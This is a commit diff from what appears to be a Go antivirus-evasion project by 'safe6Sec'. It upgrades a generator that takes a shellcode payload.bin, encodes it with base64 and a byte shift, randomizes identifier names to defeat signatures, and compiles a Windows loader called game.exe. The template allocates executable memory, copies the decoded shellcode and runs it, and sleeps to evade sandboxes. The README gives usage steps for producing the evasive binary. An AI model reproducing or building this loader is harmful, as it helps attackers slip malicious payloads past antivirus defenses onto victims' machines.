优化生成

Author: safe6Sec

README.md

@@ -25,10 +25,28 @@ golang和c++有点不一样不需要考虑处理IAT。
 敏感操作可以分步进行，如申请内存先申请读写，再改成可以执行。不要一来就直接申请读写执行的内存。  
 
 
+## 使用
+**只支持windows系统!!!!**
 
+默认payload位置C:\\Users\\Administrator\\Desktop\\payload.bin  
+执行下面命令,即可生成免杀(game.exe)
+```cmd
+指定payload
+main.exe payload.bin
 
+不指定payload，直接运行即可
+main.exe
+```
+
+
+
+## 更新
+
+2021.8.29
+完善生成命令，不用手动改特征。已经支持全部动态生成，只需要指定payload即可生成免杀。   
+源码在gen目录下面   
+默认生成的是带弹窗，想不带弹窗，自行修改源码。
 
-## 说明
 
 2021.8.24  
 直接用gen里面代码进行生成,演示视频已经放公众号，目前免杀已达目的更新会放缓。   

gen/main.go

@@ -4,44 +4,118 @@ import (
 	"encoding/base64"
 	"fmt"
 	"io/ioutil"
+	"math/rand"
 	"os"
+	"os/exec"
 	"strings"
+	"time"
 )
 
-var kkk = []byte{0x23, 0x32}
+var (
+	key          []byte
+	keys         string
+	keyName      string
+	decodeName   string
+	genName      string
+	gd           string
+	bbdataName   string
+	shellCodeHex string
+	bdata        string
+)
+
+func init() {
+	//初始化key
+	key = getKey()
+	//key变量名
+	keyName = randString(4)
+	//解码方法名
+	decodeName = randString(5)
+	//生成exe方法名
+	genName = randString(3)
+	//混淆方法名
+	gd = randString(6)
+
+	//base64变量
+	bbdataName = randString(2)
+
+	shellCodeHex = randString(4)
+}
+
+func getKey() []byte {
+	keys = randString(2)
+	b := []byte(keys)
+	return b
+}
+
+func randString(len int) string {
+	r := rand.New(rand.NewSource(time.Now().Unix()))
+	bytes := make([]byte, len)
+	for i := 0; i < len; i++ {
+		b := r.Intn(26) + 65
+		bytes[i] = byte(b)
+	}
+	return string(bytes)
+}
 
 func getEnCode(data []byte) string {
 	bdata1 := base64.StdEncoding.EncodeToString(data)
 	bydata1 := []byte(bdata1)
 	var shellcode []byte
 
 	for i := 0; i < len(bydata1); i++ {
-		shellcode = append(shellcode, bydata1[i]+kkk[0]-kkk[1])
+		shellcode = append(shellcode, bydata1[i]+key[0]-key[1])
 	}
 	return base64.StdEncoding.EncodeToString(shellcode)
 }
 
+func gen(code *string) {
+
+	*code = strings.ReplaceAll(*code, "$bdata", bdata)
+	*code = strings.ReplaceAll(*code, "$bbdata", bbdataName)
+	*code = strings.ReplaceAll(*code, "$keyName", keyName)
+	*code = strings.ReplaceAll(*code, "$keys", keys)
+	*code = strings.ReplaceAll(*code, "$shellCodeHex", shellCodeHex)
+	*code = strings.ReplaceAll(*code, "$gd", gd)
+	//*code=strings.ReplaceAll(*code, "$gdNum", ss)
+	*code = strings.ReplaceAll(*code, "$genEXE", genName)
+	*code = strings.ReplaceAll(*code, "$getDeCode", decodeName)
+
+}
+
 func main() {
 
 	path := "C:\\Users\\Administrator\\Desktop\\payload.bin"
 	if len(os.Args) >= 2 {
 		path = os.Args[1]
 	}
 	sc, _ := ioutil.ReadFile(path)
-	bdata := getEnCode(sc)
-	fmt.Println(bdata)
-	ioutil.WriteFile("shellcode.txt", []byte(bdata), 0666)
-
-	tmpl, _ := ioutil.ReadFile("./genExe")
-
+	bdata = getEnCode(sc)
+	fmt.Println("获取payload", "---->", path)
+	//fmt.Println(bdata)
+	time.Sleep(1 * time.Second)
+	//ioutil.WriteFile("shellcode.txt", []byte(bdata), 0666)
+	fmt.Println("解析shellcode模板")
+	time.Sleep(1 * time.Second)
+	tmpl, _ := ioutil.ReadFile("./template")
 	code := string(tmpl)
+	fmt.Println("生成shellcode")
+	time.Sleep(1 * time.Second)
 
-	code = strings.ReplaceAll(code, "${bdata}", bdata)
-
+	gen(&code)
 	ioutil.WriteFile("shellcode.go", []byte(code), 0666)
-	//cmd := exec.Command("go", "build", "shellcode.go", "-ldflags=\"-s -w -H=windowsgui\"", "-o", "game.exe", "shellcode.go")
-	//cmd:=exec.Command("go","build shellcode.go -ldflags=\"-s -w -H=windowsgui\" -o main2.exe shellcode.go")
-	//cmd.Run()
-	//os.Remove("shellcode.go")
+
+	fmt.Println("编译shellcode")
+	time.Sleep(1 * time.Second)
+
+	cmd := exec.Command("cmd.exe", "/c", "go build -ldflags=-s -o game.exe ./shellcode.go")
+	//隐藏窗口，如有需要自行替换
+	//cmd:= exec.Command("cmd.exe","/c","go build -ldflags=-s -ldflags=-H=windowsgui -o game.exe ./shellcode.go")
+	//阻塞至等待命令执行完成
+	err1 := cmd.Run()
+	if err1 != nil {
+		panic(err1)
+	}
+	fmt.Println("game.exe")
+	os.Remove("shellcode.go")
 
 }

gen/genExe renamed to gen/template

@@ -13,9 +13,7 @@ const (
 	PAGE_EXECUTE_READWRITE = 0x40
 )
 
-var kk = []byte{0x23, 0x32}
-
-
+var $keyName []byte
 
 
 var (
@@ -25,25 +23,25 @@ var (
 	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
 )
 
-func getDeCode(string2 string) []byte {
+func $getDeCode(string2 string) []byte {
 
 	ss, _ := base64.StdEncoding.DecodeString(string2)
 	string2 = string(ss)
-	var shellcode []byte
+	var code []byte
 
 	bydata := []byte(string2)
 
 	for i := 0; i < len(bydata); i++ {
-		shellcode = append(shellcode, bydata[i]-kk[0]+kk[1])
+		code = append(code, bydata[i]-$keyName[0]+$keyName[1])
 	}
-	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
+	ssb, _ := base64.StdEncoding.DecodeString(string(code))
 	return ssb
 
 }
 
 
 
-func genEXE(charcode []byte) {
+func $genEXE(charcode []byte) {
 
 	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
 	if err != nil && err.Error() != "The operation completed successfully." {
@@ -57,19 +55,24 @@ func genEXE(charcode []byte) {
 	syscall.Syscall(addr, 0, 0, 0, 0)
 }
 
-func gd() int64 {
+func $gd() int {
 	time.Sleep(time.Duration(2) * time.Second)
 
-	dd := time.Now().UTC().UnixNano()
-	return dd + 123456
+	dd := time.Now().UTC().Day()
+	var num = 1
+        for num <= 5 {
+            num++
+        }
+	return dd + time.Now().Second()
 
 }
 
 
 
 func main() {
-	bbdata := "${bdata}"
-	shellCodeHex := getDeCode(bbdata)
-	gd()
-	genEXE(shellCodeHex)
+	$bbdata := "$bdata"
+	$keyName = []byte($keys)
+	$shellCodeHex := $getDeCode($bbdata)
+	$gd()
+	$genEXE($shellCodeHex)
 }

go.mod

@@ -4,6 +4,7 @@ go 1.16
 
 require (
 	github.com/fatih/color v1.12.0
+	github.com/go-cmd/cmd v1.3.0
 	golang.org/x/crypto v0.0.0-20210817164053-32db794688a5
 	golang.org/x/sys v0.0.0-20210823070655-63515b42dcdf
 )